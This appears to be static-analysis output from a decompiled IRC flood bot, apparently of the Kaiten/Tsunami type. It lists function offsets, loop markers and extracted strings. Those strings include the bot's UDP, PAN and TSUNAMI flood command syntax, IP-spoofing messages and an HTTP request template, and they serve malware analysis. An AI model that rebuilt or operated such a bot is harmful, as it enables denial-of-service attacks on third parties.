++++++++ FUNCTION LENGTH 630
            while (true) {
                                    while (true) {
        while (true) {
        while (true) {
        while (true) {
            while (true) {
                        while (true) {
                                while (true) {
                                            while (true) {
                                while (true) {
                                while (true) {
                                while (true) {
=================FUNCTION : function_8050ce4 ===================
++++++++ FUNCTION START 38092
++++++++ FUNCTION END 38587
++++++++ FUNCTION LENGTH 495
        while (true) {
        while (true) {
            while (true) {
            while (true) {
                        while (true) {
                            while (true) {
                    while (true) {
                        while (true) {
    while (true) {
    while (true) {
    while (true) {
=================FUNCTION : function_804daaa ===================
++++++++ FUNCTION START 17935
++++++++ FUNCTION END 21383
++++++++ FUNCTION LENGTH 3448
                while (true) {
                    while (true) {
                            while (true) {
                                    while (true) {
                while (true) {
                while (true) {
            while (true) {
=================FUNCTION : function_804ab32 ===================
++++++++ FUNCTION START 4727
++++++++ FUNCTION END 5014
++++++++ FUNCTION LENGTH 287
    while (true) {
        while (true) {
        while (true) {
            while (true) {
                while (true) {
                while (true) {
                        return function_80482b3(a1, (int32_t)"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n");
=================FUNCTION : function_80503c8 ===================
++++++++ FUNCTION START 36116
++++++++ FUNCTION END 36401
++++++++ FUNCTION LENGTH 285
        while (true) {
            while (true) {
            while (true) {
        while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_804ba10 ===================
++++++++ FUNCTION START 7473
++++++++ FUNCTION END 7709
++++++++ FUNCTION LENGTH 236
            while (true) {
        while (true) {
            while (true) {
        while (true) {
=================FUNCTION : function_804eb08 ===================
++++++++ FUNCTION START 23716
++++++++ FUNCTION END 24178
++++++++ FUNCTION LENGTH 462
        while (true) {
            while (true) {
            while (true) {
        while (true) {
=================FUNCTION : function_8049339 ===================
++++++++ FUNCTION START 3588
++++++++ FUNCTION END 3797
++++++++ FUNCTION LENGTH 209
        result = function_80482b3(a1, (int32_t)"NOTICE %s :Removed all spoofs\n");
        while (true) {
        result = function_80482b3(a1, (int32_t)"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n");
=================FUNCTION : function_804e640 ===================
++++++++ FUNCTION START 22219
++++++++ FUNCTION END 22404
++++++++ FUNCTION LENGTH 185
    while (true) {
                while (true) {
            while (true) {
=================FUNCTION : function_80517ad ===================
++++++++ FUNCTION START 42382
++++++++ FUNCTION END 42850
++++++++ FUNCTION LENGTH 468
        while (true) {
                            while (true) {
                while (true) {
=================FUNCTION : function_80514d2 ===================
++++++++ FUNCTION START 41805
++++++++ FUNCTION END 42197
++++++++ FUNCTION LENGTH 392
            while (true) {
                while (true) {
                    while (true) {
=================FUNCTION : function_804ed00 ===================
++++++++ FUNCTION START 24444
++++++++ FUNCTION END 24653
++++++++ FUNCTION LENGTH 209
        while (true) {
                        while (true) {
=================FUNCTION : function_80520b0 ===================
++++++++ FUNCTION START 44940
++++++++ FUNCTION END 45138
++++++++ FUNCTION LENGTH 198
            while (true) {
                while (true) {
=================FUNCTION : function_804bf86 ===================
++++++++ FUNCTION START 9167
++++++++ FUNCTION END 9327
++++++++ FUNCTION LENGTH 160
        while (true) {
    while (true) {
=================FUNCTION : function_804ae34 ===================
++++++++ FUNCTION START 5287
++++++++ FUNCTION END 5520
++++++++ FUNCTION LENGTH 233
    while (true) {
                    while (true) {
=================FUNCTION : function_80513b4 ===================
++++++++ FUNCTION START 41242
++++++++ FUNCTION END 41444
++++++++ FUNCTION LENGTH 202
        while (true) {
    while (true) {
=================FUNCTION : function_804e2d9 ===================
++++++++ FUNCTION START 21539
++++++++ FUNCTION END 21794
++++++++ FUNCTION LENGTH 255
        while (true) {
                while (true) {
=================FUNCTION : function_80495af ===================
++++++++ FUNCTION START 3929
++++++++ FUNCTION END 4117
++++++++ FUNCTION LENGTH 188
        function_80482b3(a1, (int32_t)"NOTICE %s :UDP <target> <port> <secs>\n");
    while (true) {
=================FUNCTION : function_8050590 ===================
++++++++ FUNCTION START 36937
++++++++ FUNCTION END 38089
++++++++ FUNCTION LENGTH 1152
                        while (true) {
                                                                            while (true) {
=================FUNCTION : function_804985f ===================
++++++++ FUNCTION START 4120
++++++++ FUNCTION END 4315
++++++++ FUNCTION LENGTH 195
        function_80482b3(a1, (int32_t)"NOTICE %s :PAN <target> <port> <secs>\n");
    while (true) {
=================FUNCTION : function_804fc00 ===================
++++++++ FUNCTION START 31764
++++++++ FUNCTION END 31980
++++++++ FUNCTION LENGTH 216
        while (true) {
    while (true) {
=================FUNCTION : function_8049c58 ===================
++++++++ FUNCTION START 4318
++++++++ FUNCTION END 4500
++++++++ FUNCTION LENGTH 182
        function_80482b3(a1, (int32_t)"NOTICE %s :TSUNAMI <target> <secs>\n");
    while (true) {
=================FUNCTION : function_804f954 ===================
++++++++ FUNCTION START 30831
++++++++ FUNCTION END 31015
++++++++ FUNCTION LENGTH 184
    while (true) {
            while (true) {
=================FUNCTION : function_8051418 ===================
++++++++ FUNCTION START 41447
++++++++ FUNCTION END 41611
++++++++ FUNCTION LENGTH 164
    while (true) {
        while (true) {
=================FUNCTION : function_80504fc ===================
++++++++ FUNCTION START 36720
++++++++ FUNCTION END 36934
++++++++ FUNCTION LENGTH 214
        while (true) {
            while (true) {
=================FUNCTION : function_8048f4f ===================
++++++++ FUNCTION START 2935
++++++++ FUNCTION END 3055
++++++++ FUNCTION LENGTH 120
        result = function_80482b3(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n");
        result = function_80482b3(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d\n");
=================FUNCTION : function_804f794 ===================
++++++++ FUNCTION START 29837
++++++++ FUNCTION END 29983
++++++++ FUNCTION LENGTH 146
        v108 = sigprocmask(how, set, oset);
    v108 = sigprocmask(how, set, oset);
=================FUNCTION : function_80504d4 ===================
++++++++ FUNCTION START 36546
++++++++ FUNCTION END 36717
++++++++ FUNCTION LENGTH 171
        while (true) {
                while (true) {
=================FUNCTION : function_8051c48 ===================
++++++++ FUNCTION START 43485
++++++++ FUNCTION END 43604
++++++++ FUNCTION LENGTH 119
    int32_t v107 = function_804b90c((int32_t)"/etc/hosts", (int32_t)&v106); // 0x8051c55
        result = function_804b90c((int32_t)"/etc/config/hosts", (int32_t)&v106);
=================FUNCTION : function_804c0dc ===================
++++++++ FUNCTION START 9740
++++++++ FUNCTION END 10496
++++++++ FUNCTION LENGTH 756
    while (true) {
                                                                                while (true) {
=================FUNCTION : function_804d490 ===================
++++++++ FUNCTION START 15867
++++++++ FUNCTION END 16142
++++++++ FUNCTION LENGTH 275
    while (true) {
                        while (true) {
=================FUNCTION : function_804f898 ===================
++++++++ FUNCTION START 30469
++++++++ FUNCTION END 30704
++++++++ FUNCTION LENGTH 235
            while (true) {
        while (true) {
=================FUNCTION : function_804f08b ===================
++++++++ FUNCTION START 26176
++++++++ FUNCTION END 26842
++++++++ FUNCTION LENGTH 666
        while (true) {
=================FUNCTION : function_804f7ec ===================
++++++++ FUNCTION START 29986
++++++++ FUNCTION END 30106
++++++++ FUNCTION LENGTH 120
    int32_t v107 = wait4(pid, status, options, rusage); // 0x804f809
=================FUNCTION : function_8051364 ===================
++++++++ FUNCTION START 40956
++++++++ FUNCTION END 41091
++++++++ FUNCTION LENGTH 135
    while (true) {
=================FUNCTION : function_804b6dc ===================
++++++++ FUNCTION START 6017
++++++++ FUNCTION END 6137
++++++++ FUNCTION LENGTH 120
    int32_t v107 = kill(pid, sig_num); // 0x804b6ef
=================FUNCTION : function_804aaaa ===================
++++++++ FUNCTION START 4503
++++++++ FUNCTION END 4613
++++++++ FUNCTION LENGTH 110
    return function_80482b3(a1, (int32_t)"WHO %s\n");
=================FUNCTION : function_804b64c ===================
++++++++ FUNCTION START 5770
++++++++ FUNCTION END 5891
++++++++ FUNCTION LENGTH 121
    int32_t pid = getpid(v107); // 0x804b655
=================FUNCTION : function_804cda0 ===================
++++++++ FUNCTION START 12619
++++++++ FUNCTION END 12797
++++++++ FUNCTION LENGTH 178
    while (true) {
=================FUNCTION : function_804cfd4 ===================
++++++++ FUNCTION START 13016
++++++++ FUNCTION END 13203
++++++++ FUNCTION LENGTH 187
            while (true) {
=================FUNCTION : function_804d240 ===================
++++++++ FUNCTION START 14404
++++++++ FUNCTION END 14542
++++++++ FUNCTION LENGTH 138
    while (true) {
=================FUNCTION : function_804d218 ===================
++++++++ FUNCTION START 14263
++++++++ FUNCTION END 14401
++++++++ FUNCTION LENGTH 138
    while (true) {
=================FUNCTION : function_805144c ===================
++++++++ FUNCTION START 41614
++++++++ FUNCTION END 41802
++++++++ FUNCTION LENGTH 188
        while (true) {
=================FUNCTION : function_804b624 ===================
++++++++ FUNCTION START 5646
++++++++ FUNCTION END 5767
++++++++ FUNCTION LENGTH 121
    int32_t v108 = fork(v107); // 0x804b62d
=================FUNCTION : function_804d34c ===================
++++++++ FUNCTION START 15030
++++++++ FUNCTION END 15169
++++++++ FUNCTION LENGTH 139
    while (true) {
=================FUNCTION : function_804e993 ===================
++++++++ FUNCTION START 23156
++++++++ FUNCTION END 23339
++++++++ FUNCTION LENGTH 183
            while (true) {
=================FUNCTION : function_804f6b0 ===================
++++++++ FUNCTION START 29307
++++++++ FUNCTION END 29432
++++++++ FUNCTION LENGTH 125
    int32_t fd = open(path, 0x1000000 * a2 / 0x1000000); // 0x804f6db
=================FUNCTION : function_804c748 ===================
++++++++ FUNCTION START 10789
++++++++ FUNCTION END 11061
++++++++ FUNCTION LENGTH 272
        while (true) {
=================FUNCTION : function_8052020 ===================
++++++++ FUNCTION START 44752
++++++++ FUNCTION END 44937
++++++++ FUNCTION LENGTH 185
    while (true) {
=================FUNCTION : function_804f334 ===================
++++++++ FUNCTION START 26991
++++++++ FUNCTION END 27101
++++++++ FUNCTION LENGTH 110
    uint32_t result = vfork(); // 0x804f33a
=================FUNCTION : function_805218c ===================
++++++++ FUNCTION START 45141
++++++++ FUNCTION END 45291
++++++++ FUNCTION LENGTH 150
    while (true) {
=================FUNCTION : function_80486dd ===================
++++++++ FUNCTION START 1901
++++++++ FUNCTION END 2233
++++++++ FUNCTION LENGTH 332
    while (true) {
=================FUNCTION : function_804c694 ===================
++++++++ FUNCTION START 10499
++++++++ FUNCTION END 10667
++++++++ FUNCTION LENGTH 168
        while (true) {
=================FUNCTION : function_804ce84 ===================
++++++++ FUNCTION START 12800
++++++++ FUNCTION END 13013
++++++++ FUNCTION LENGTH 213
    while (true) {
=================FUNCTION : function_804ad9b ===================
++++++++ FUNCTION START 5131
++++++++ FUNCTION END 5284
++++++++ FUNCTION LENGTH 153
    while (true) {
=================FUNCTION : function_8052000 ===================
++++++++ FUNCTION START 44615
++++++++ FUNCTION END 44749
++++++++ FUNCTION LENGTH 134
    while (true) {
=================FUNCTION : function_805169c ===================
++++++++ FUNCTION START 42200
++++++++ FUNCTION END 42379
++++++++ FUNCTION LENGTH 179
    while (true) {
=================FUNCTION : function_8051384 ===================
++++++++ FUNCTION START 41094
++++++++ FUNCTION END 41239
++++++++ FUNCTION LENGTH 145
        while (true) {
=================FUNCTION : function_804f498 ===================
++++++++ FUNCTION START 27839
++++++++ FUNCTION END 27959
++++++++ FUNCTION LENGTH 120
    int32_t v107 = clock_getres(clk_id, res); // 0x804f4ab
=================FUNCTION : function_8048455 ===================
++++++++ FUNCTION START 1594
++++++++ FUNCTION END 1724
++++++++ FUNCTION LENGTH 130
    while (true) {
=================FUNCTION : function_804b5f4 ===================
++++++++ FUNCTION START 5523
++++++++ FUNCTION END 5643
++++++++ FUNCTION LENGTH 120
    int32_t v107 = close(fd); // 0x804b604
=================FUNCTION : function_804c03c ===================
++++++++ FUNCTION START 9454
++++++++ FUNCTION END 9594
++++++++ FUNCTION LENGTH 140
    while (true) {
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 3 @ function_8048a25 ====================================
++++++++ WHILE START : 2668 
++++++++ WHILE FUNCTION : function_8048a25 
++++++++ WHILE END : 2931 
++++++++ INTRESTING INSTRUCTIONS :  
		function_80482b3(a1, (int32_t)"NOTICE %s :Unable to connect to http.\n");
		function_80482b3(v108, (int32_t)"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 8 @ function_804ab32 ====================================
++++++++ WHILE START : 4835 
++++++++ WHILE FUNCTION : function_804ab32 
++++++++ WHILE END : 5013 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		return function_80482b3(a1, (int32_t)"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n");
=============================WHILE LOOPS ID : 10 @ function_804ae34 ====================================
++++++++ WHILE START : 5398 
++++++++ WHILE FUNCTION : function_804ae34 
++++++++ WHILE END : 5519 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 12 @ function_804ba10 ====================================
++++++++ WHILE START : 7621 
++++++++ WHILE FUNCTION : function_804ba10 
++++++++ WHILE END : 7677 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 17 @ function_804c0dc ====================================
++++++++ WHILE START : 9867 
++++++++ WHILE FUNCTION : function_804c0dc 
++++++++ WHILE END : 10495 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 20 @ function_804c885 ====================================
++++++++ WHILE START : 11312 
++++++++ WHILE FUNCTION : function_804c885 
++++++++ WHILE END : 12185 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 28 @ function_804d490 ====================================
++++++++ WHILE START : 15978 
++++++++ WHILE FUNCTION : function_804d490 
++++++++ WHILE END : 16141 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 30 @ function_804daaa ====================================
++++++++ WHILE START : 18301 
++++++++ WHILE FUNCTION : function_804daaa 
++++++++ WHILE END : 20279 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 34 @ function_804e2d9 ====================================
++++++++ WHILE START : 21668 
++++++++ WHILE FUNCTION : function_804e2d9 
++++++++ WHILE END : 21790 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 35 @ function_804e640 ====================================
++++++++ WHILE START : 22329 
++++++++ WHILE FUNCTION : function_804e640 
++++++++ WHILE END : 22403 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 41 @ function_804ed00 ====================================
++++++++ WHILE START : 24555 
++++++++ WHILE FUNCTION : function_804ed00 
++++++++ WHILE END : 24649 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 45 @ function_804f954 ====================================
++++++++ WHILE START : 30946 
++++++++ WHILE FUNCTION : function_804f954 
++++++++ WHILE END : 31014 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 48 @ function_804fcd0 ====================================
++++++++ WHILE START : 32168 
++++++++ WHILE FUNCTION : function_804fcd0 
++++++++ WHILE END : 35329 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 49 @ function_804fcd0 ====================================
++++++++ WHILE START : 35339 
++++++++ WHILE FUNCTION : function_804fcd0 
++++++++ WHILE END : 35437 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 57 @ function_80504d4 ====================================
++++++++ WHILE START : 36662 
++++++++ WHILE FUNCTION : function_80504d4 
++++++++ WHILE END : 36711 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 58 @ function_80504fc ====================================
++++++++ WHILE START : 36834 
++++++++ WHILE FUNCTION : function_80504fc 
++++++++ WHILE END : 36928 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 59 @ function_8050590 ====================================
++++++++ WHILE START : 37076 
++++++++ WHILE FUNCTION : function_8050590 
++++++++ WHILE END : 37931 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 61 @ function_8050ce4 ====================================
++++++++ WHILE START : 38262 
++++++++ WHILE FUNCTION : function_8050ce4 
++++++++ WHILE END : 38303 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 62 @ function_8050ce4 ====================================
++++++++ WHILE START : 38312 
++++++++ WHILE FUNCTION : function_8050ce4 
++++++++ WHILE END : 38427 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 72 @ function_8051418 ====================================
++++++++ WHILE START : 41565 
++++++++ WHILE FUNCTION : function_8051418 
++++++++ WHILE END : 41610 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 74 @ function_80514d2 ====================================
++++++++ WHILE START : 41949 
++++++++ WHILE FUNCTION : function_80514d2 
++++++++ WHILE END : 42188 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 76 @ function_80517ad ====================================
++++++++ WHILE START : 42516 
++++++++ WHILE FUNCTION : function_80517ad 
++++++++ WHILE END : 42846 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 81 @ function_8051c79 ====================================
++++++++ WHILE START : 43921 
++++++++ WHILE FUNCTION : function_8051c79 
++++++++ WHILE END : 44171 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 85 @ function_80520b0 ====================================
++++++++ WHILE START : 45063 
++++++++ WHILE FUNCTION : function_80520b0 
++++++++ WHILE END : 45129 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
